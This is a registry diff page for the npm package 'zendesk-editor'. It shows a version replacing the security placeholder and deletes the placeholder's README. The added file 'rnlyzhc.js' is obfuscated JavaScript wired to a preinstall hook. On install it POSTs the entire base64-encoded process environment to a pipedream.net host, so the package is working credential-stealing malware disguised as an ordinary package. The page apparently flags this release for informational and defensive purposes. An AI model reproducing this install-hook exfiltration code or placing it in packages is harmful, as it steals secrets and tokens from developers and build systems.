zendesk-editor 0.0.1-security → 30.895.454
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zendesk-editor might be problematic. Click here for more details.
- package/package.json +8 -3
- package/rnlyzhc.js +1 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zendesk-editor",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "30.895.454",
|
|
4
|
+
"main": "rnlyzhc.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node rnlyzhc.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/rnlyzhc.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0xdde618=a0_0xad14;function a0_0xad14(_0x209066,_0x31398f){const _0x2e7f42=a0_0x2e7f();return a0_0xad14=function(_0xad14d0,_0x3b9701){_0xad14d0=_0xad14d0-0x10b;let _0x14fe41=_0x2e7f42[_0xad14d0];return _0x14fe41;},a0_0xad14(_0x209066,_0x31398f);}function a0_0x2e7f(){const _0x39f53b=['6lElSrU','join','npm_package_name','4aaa0dfa016c3686a57e93787657fa37','1015516JgAFEp','request','114621yEhrcX','2hhRrhG','from','stringify','5Mbpqig','POST','net','env','280548gCVTgJ','pipedream','541124JGXcTZ','1140588ndwMFj','1069691rtRQik','16xRTrvp','toString','write','4909540mwgAcq','737SbFEEe'];a0_0x2e7f=function(){return _0x39f53b;};return a0_0x2e7f();}(function(_0x51a894,_0x56b65f){const _0x2e5738=a0_0xad14,_0x20a1ce=_0x51a894();while(!![]){try{const _0x51cfb1=-parseInt(_0x2e5738(0x11a))/0x1+parseInt(_0x2e5738(0x111))/0x2*(-parseInt(_0x2e5738(0x110))/0x3)+parseInt(_0x2e5738(0x10e))/0x4*(-parseInt(_0x2e5738(0x114))/0x5)+parseInt(_0x2e5738(0x122))/0x6*(-parseInt(_0x2e5738(0x11c))/0x7)+-parseInt(_0x2e5738(0x11d))/0x8*(-parseInt(_0x2e5738(0x11b))/0x9)+-parseInt(_0x2e5738(0x120))/0xa+parseInt(_0x2e5738(0x121))/0xb*(parseInt(_0x2e5738(0x118))/0xc);if(_0x51cfb1===_0x56b65f)break;else _0x20a1ce['push'](_0x20a1ce['shift']());}catch(_0x831ab0){_0x20a1ce['push'](_0x20a1ce['shift']());}}}(a0_0x2e7f,0x53b60));const http=require('https');req=http[a0_0xdde618(0x10f)]({'host':[a0_0xdde618(0x10d),'m',a0_0xdde618(0x119),a0_0xdde618(0x116)][a0_0xdde618(0x10b)]('.'),'path':'/'+(process[a0_0xdde618(0x117)][a0_0xdde618(0x10c)]||''),'method':a0_0xdde618(0x115)}),req[a0_0xdde618(0x11f)](Buffer[a0_0xdde618(0x112)](JSON[a0_0xdde618(0x113)](process[a0_0xdde618(0x117)]))[a0_0xdde618(0x11e)]('base64')),req['end']();
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zendesk-editor for more information.
|